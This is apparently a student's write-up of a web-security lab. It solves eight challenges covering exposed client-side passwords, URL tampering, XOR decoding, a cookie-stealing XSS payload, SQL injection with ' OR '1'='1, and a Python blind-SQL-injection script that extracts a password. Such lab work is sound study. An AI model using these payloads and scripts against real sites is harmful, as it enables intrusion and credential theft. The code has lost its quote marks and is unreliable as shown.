Exploiting vulnerabilities in web services
published
Web Services vulnerabilities
Challenge 1:
Simply by inspecting the website code we can easily find the requested password.
This may seem as a very silly error, but a lot of times we find that old webpages or bad implementations leave comments or parts of the code where passwords or other important variables can be found and inspected by any user. That's why it is important to differenciate between client-side and server-side.
Challenge 2
Same concept as challenge 1.
Same problem but in this case the developer checks the password using javascript and with no encryption which leads to this case where any user can discover the password by just looking at the code.
Challenge 3
In this challenge the url contains a GET variable username. It seems that depending on this variable it shows the password of that user. So we simply change that username get variable to rjy906 that is our username and our password will be displayed.
Challenge 4
<link href=/static/level4_passwords/favicon.ico rel=icon>
Going to the folder where the favicon is we can also access to the file where the passwords are stored.
Challenge 5
In this case, as it says in the hint the program is using and encryption based on XOR. The encrypted_password = password XOR secret_key is what is stored and checked to match. So we can program a simple python codes that does just this using rjy906 as the secret_key.
The value of the encrypted password can be found in the code:
def xor_decrypt(encrypted_bytes, key):
key_bytes = key.encode()
decrypted = bytearray()
for i in range(len(encrypted_bytes)):
decrypted_byte = encrypted_bytes[i] ^ key_bytes[i % len(key_bytes)]
decrypted.append(decrypted_byte)
return decrypted.decode(errors=replace) # replace in case of any non-printables
key = rjy906
decrypted = xor_decrypt(base64.b64decode(QVlOAQUGRl1MAAYGRVpNCg==), key)
print(Decrypted password:, decrypted)
Challenge 6
Based on that we can craft a JS script that returns in the you-said message the document.cookie in which our password is stored.
<script>document.getElementById('you-said').innerText=document.cookie</script>
Sending this we get our password back as our response
Challenge 7
Looking at the cookies of the website we find:
Setting show_query to true shows this message:
Now we can edit our input so it is treated as SQL code and executed by the query. Since this query retrieves all the columns of the table students we just need to make the condition after WHERE TRUE to get the resut.
Our input its going to be: ' OR '1'='1. So it will be executed and it will make our WHERE condition true.
Challenge 8
Very similar to challenge 7, but now we do not know the SQL query that is being executed, we just receive true if the query is correct and gets execute it and false if there is an error.
For this case I have crafted a python code that iterates over the alphabet trying one by one all the letters till we get the true, meaning thats the correct letter.
import requests
url = http://100.26.176.156/level8_password/
pid = 038139911
entry_password = 9B5aFswFkmVq8hpA
charset = abcdefghijklmnopqrstuvwxyz
final_password =
for i in range(1, 9): # 8-character password
print(f[*] Testing character {i})
for c in charset:
injection = f' OR SUBSTRING(password,{i},1)='{c}
data = {
pid: pid,
entry_password: entry_password,
password: injection
}
response = requests.post(url, data=data)
if <p>success</p> in response.text:
print(f[+] Found character {i}: {c})
final_password += c
break
else:
print(f[-] Tried {c})
print(f\n Final extracted password: {final_password})
After running this code we get the password and we can use it to complete the last level.